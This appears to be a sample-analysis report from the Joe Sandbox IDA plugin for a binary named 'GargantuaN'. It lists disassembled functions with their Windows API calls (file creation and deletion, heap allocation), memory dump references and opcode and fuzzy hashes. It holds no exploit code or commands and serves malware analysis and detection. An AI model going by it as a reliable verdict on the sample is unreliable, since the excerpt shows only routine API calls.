                                                        Uniqueness Score: -1.00%

                                                        Function 00D7AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D7A56F), ref: 00D7AF55
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3084827643
                                                        • Opcode ID: 2ed37abd5144fc6b085701a3a0a2e5bdddb9e1fe0afde1efa94d364411110ccb
                                                        • Instruction ID: 6616f34fa0c9223b0de40af48bb2afb9f69120eef0833ec2313e60ce184c64ad
                                                        • Opcode Fuzzy Hash: 2ed37abd5144fc6b085701a3a0a2e5bdddb9e1fe0afde1efa94d364411110ccb
                                                        • Instruction Fuzzy Hash: E2F0BE71A45208BFCB026F58DC06DAEBF61EF44B11B018064FC0CAA260EA318A109BB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: FlsAlloc
                                                        • API String ID: 2773662609-671089009
                                                        • Opcode ID: cb801e290d08dfddb058b5afe6bdaf578e0a1d6aaa7769f57b16def56d667ca0
                                                        • Instruction ID: 63e04a6e0ae5b34e156ef98a5dfa7ff4ee8a8bd3848e2c11e4539b7bb2723ac5
                                                        • Opcode Fuzzy Hash: cb801e290d08dfddb058b5afe6bdaf578e0a1d6aaa7769f57b16def56d667ca0
                                                        • Instruction Fuzzy Hash: CFE0E571745318BFC611BB69DC06D6EBB54DB44B21B114199F81997340ED709E008BFA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00D6EAF9
                                                          • Part of subcall function 00D6E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6E8D0
                                                          • Part of subcall function 00D6E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6E8E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID: 3To
                                                        • API String ID: 1269201914-245939750
                                                        • Opcode ID: e3f68baff5bad1aa0e0824769b6fe207e8b2005f8b554fbd33f17f9e6f0ced80
                                                        • Instruction ID: de208e515986fb939811b5c02b2ee6b50cc2a930089289f4a94c5f271ca90a60
                                                        • Opcode Fuzzy Hash: e3f68baff5bad1aa0e0824769b6fe207e8b2005f8b554fbd33f17f9e6f0ced80
                                                        • Instruction Fuzzy Hash: 5BB012CE2EA142FE320872401D03C37430CC5C0B90330903EF401C4091EC804C091871
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D7B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D7BA44,?), ref: 00D7B7E6
                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D7BA89,?,00000000), ref: 00D7BC64
                                                        • GetCPInfo.KERNEL32(00000000,00D7BA89,?,?,?,00D7BA89,?,00000000), ref: 00D7BC77
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CodeInfoPageValid
                                                        • String ID:
                                                        • API String ID: 546120528-0
                                                        • Opcode ID: c15ebd8c26126a0fc157c9bf719272839fd25af89bad944a5621e050e4ed48e5
                                                        • Instruction ID: 3654e7d1c28134b62b23f3577870267a3aec4da23ef94d3d74426e433c65f35a
                                                        • Opcode Fuzzy Hash: c15ebd8c26126a0fc157c9bf719272839fd25af89bad944a5621e050e4ed48e5
                                                        • Instruction Fuzzy Hash: 575131709003059EDB319F75C8817BABBE5EF41320F18C46FD49A8B251F77599468BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00D59A50,?,?,00000000,?,?,00D58CBC,?), ref: 00D59BAB
                                                        • GetLastError.KERNEL32(?,00000000,00D58411,-00009570,00000000,000007F3), ref: 00D59BB6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: 768992894a2d3e1154ebe7551708483d0ce35ab7367b480386502c8059cd9c22
                                                        • Instruction ID: 0706d75d82fc6160274b89cf99841a867655153c2a566a84450bbf5215e82b66
                                                        • Opcode Fuzzy Hash: 768992894a2d3e1154ebe7551708483d0ce35ab7367b480386502c8059cd9c22
                                                        • Instruction Fuzzy Hash: 2A41AD70504301CBEF249F29E5A446AF7E5FBD4722F188A2DEC9583260E770ED488B71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D797E5: GetLastError.KERNEL32(?,00D91030,00D74674,00D91030,?,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D797E9
                                                          • Part of subcall function 00D797E5: _free.LIBCMT ref: 00D7981C
                                                          • Part of subcall function 00D797E5: SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D7985D
                                                          • Part of subcall function 00D797E5: _abort.LIBCMT ref: 00D79863
                                                          • Part of subcall function 00D7BB4E: _abort.LIBCMT ref: 00D7BB80
                                                          • Part of subcall function 00D7BB4E: _free.LIBCMT ref: 00D7BBB4
                                                          • Part of subcall function 00D7B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D7BA44,?), ref: 00D7B7E6
                                                        • _free.LIBCMT ref: 00D7BA9F
                                                        • _free.LIBCMT ref: 00D7BAD5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: f7ede632ac984d6f29d2c82744b87325394123b7767d7378f15d27e463c2ae60
                                                        • Instruction ID: bccc80e5f5dcd2f65b1f2c1bb21ce1fc7509553bdfb418cb609e5cb466cfd9d4
                                                        • Opcode Fuzzy Hash: f7ede632ac984d6f29d2c82744b87325394123b7767d7378f15d27e463c2ae60
                                                        • Instruction Fuzzy Hash: FF317331904209AFDB14EFA8D445B9DB7E5EF51330F25809AE9089B2A2FB729D40DB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D51E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D51E55
                                                          • Part of subcall function 00D53BBA: __EH_prolog.LIBCMT ref: 00D53BBF
                                                        • _wcslen.LIBCMT ref: 00D51EFD
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog$_wcslen
                                                        • String ID:
                                                        • API String ID: 2838827086-0
                                                        • Opcode ID: e5ce015e6b4d1a9922044ea3b50a61d849995a412eafac7d47c36f1e82357b5f
                                                        • Instruction ID: 818af13f8f9869d2283e5111894b423f4284b5801d61a46b3ec8e08973638676
                                                        • Opcode Fuzzy Hash: e5ce015e6b4d1a9922044ea3b50a61d849995a412eafac7d47c36f1e82357b5f
                                                        • Instruction Fuzzy Hash: 09311476904209ABCF11DF98C945AAEBBF6EF08300F2440A9FC45A7251CB365E48CB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D573BC,?,?,?,00000000), ref: 00D59DBC
                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D59E70
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$BuffersFlushTime
                                                        • String ID:
                                                        • API String ID: 1392018926-0
                                                        • Opcode ID: 37ddd9c5cb32483e438fbb144f456f16fd14ca613b3cfddf6bf87d33aa30db1e
                                                        • Instruction ID: 64a5e54c3753385b503079f13454e6cda2060679a3fbc8aac653aa211a8fa11a
                                                        • Opcode Fuzzy Hash: 37ddd9c5cb32483e438fbb144f456f16fd14ca613b3cfddf6bf87d33aa30db1e
                                                        • Instruction Fuzzy Hash: FE21BF31249245DBCB14CE64C4A2AAAFBE8AF55705F08491DFCC587191D339E90D9B71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D59F27,?,?,00D5771A), ref: 00D596E6
                                                        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D59F27,?,?,00D5771A), ref: 00D59716
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 1416dbd5b972fc56da46f0501139917b77ca37705e6c564049642dfbf7d88c93
                                                        • Instruction ID: 85b3e0d5a281144bddc013e17ad8d51658affb5696383f303e4ee957b8c91d86
                                                        • Opcode Fuzzy Hash: 1416dbd5b972fc56da46f0501139917b77ca37705e6c564049642dfbf7d88c93
                                                        • Instruction Fuzzy Hash: A521CF71100344AFE7308A65CC89BA7B7DCEB49326F040A19FED6C61D1C7B8A8889671
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D59E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D59EC7
                                                        • GetLastError.KERNEL32 ref: 00D59ED4
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: 37aa7196f2ad1a5ba2d2a5374b9ee5d1fb66fea755e9d83f4b0e56e7eb5ada18
                                                        • Instruction ID: f4c9118f0d2238143ebc926a61a17b6af17336b7e25c4c326c589d3152848337
                                                        • Opcode Fuzzy Hash: 37aa7196f2ad1a5ba2d2a5374b9ee5d1fb66fea755e9d83f4b0e56e7eb5ada18
                                                        • Instruction Fuzzy Hash: C011C231601700EBDB24C628C856BAAF7E9AB45362F644A29FD53D26D0D7B0ED4DC770
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D78E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00D78E75
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D91098,00D517CE,?,?,00000007,?,?,?,00D513D6,?,00000000), ref: 00D78EB1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocAllocate_free
                                                        • String ID:
                                                        • API String ID: 2447670028-0
                                                        • Opcode ID: 82ed6a265d47e30eb230fa5133e39cea01f945809dd0c6e41420b083df676756
                                                        • Instruction ID: 9256cb8021f0a4b34e557f75aceb77f91ed9ad0daba2687b85af482f34489c89
                                                        • Opcode Fuzzy Hash: 82ed6a265d47e30eb230fa5133e39cea01f945809dd0c6e41420b083df676756
                                                        • Instruction Fuzzy Hash: F8F09632681215AADB212A259C0DB6F7758CF91B70F68D126F86CAA191FF72DD00B1B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 00D610AB
                                                        • GetProcessAffinityMask.KERNEL32(00000000), ref: 00D610B2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Process$AffinityCurrentMask
                                                        • String ID:
                                                        • API String ID: 1231390398-0
                                                        • Opcode ID: 08292bcad211cc9a586062cf0c8d12afed2dbcb29d46074821ed5a3b47b5b776
                                                        • Instruction ID: ee9df6a5b61d4eeb47e3b9d2b3619533bee91f5f937a1147dd79400ac77c103d
                                                        • Opcode Fuzzy Hash: 08292bcad211cc9a586062cf0c8d12afed2dbcb29d46074821ed5a3b47b5b776
                                                        • Instruction Fuzzy Hash: 08E0DF3AF10249A7CF098BB89C058EB73EDEA4420432C8179E403E3241FA30EE424BB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A501
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A532
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile$_wcslen
                                                        • String ID:
                                                        • API String ID: 2673547680-0
                                                        • Opcode ID: 2147c2512a632caf3a2e4973b2679c27e0ccde624a8b7f4dfed086eb35c30563
                                                        • Instruction ID: 79077a60f6251482c8bb05f0fd4f16f7daa2f958c357b5cc855fe078ba02c48e
                                                        • Opcode Fuzzy Hash: 2147c2512a632caf3a2e4973b2679c27e0ccde624a8b7f4dfed086eb35c30563
                                                        • Instruction Fuzzy Hash: 8BF03932250219BBDF015F64DC45FDE376CAB04786F488462BD49E6260EB71DA98EB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(000000FF,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641,000000FF), ref: 00D5A1F1
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D5977F,?,?,00D595CF,?,?,?,?,?,00D82641), ref: 00D5A21F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile$_wcslen
                                                        • String ID:
                                                        • API String ID: 2643169976-0
                                                        • Opcode ID: a54fc7e70cacec6663d2c92de34bcafe50687a6ae05e07acd7512cbd2d6578f7
                                                        • Instruction ID: 92e610284b769288e298b89f30794839b5873336b8f033c02230e15cf90d026c
                                                        • Opcode Fuzzy Hash: a54fc7e70cacec6663d2c92de34bcafe50687a6ae05e07acd7512cbd2d6578f7
                                                        • Instruction Fuzzy Hash: F7E092351502196BDF019F64EC46FD9375CAF08787F484021BD48D2150EB61DE98EB74
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6AC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,00D82641,000000FF), ref: 00D6ACB0
                                                        • OleUninitialize.OLE32(?,?,?,?,00D82641,000000FF), ref: 00D6ACB5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
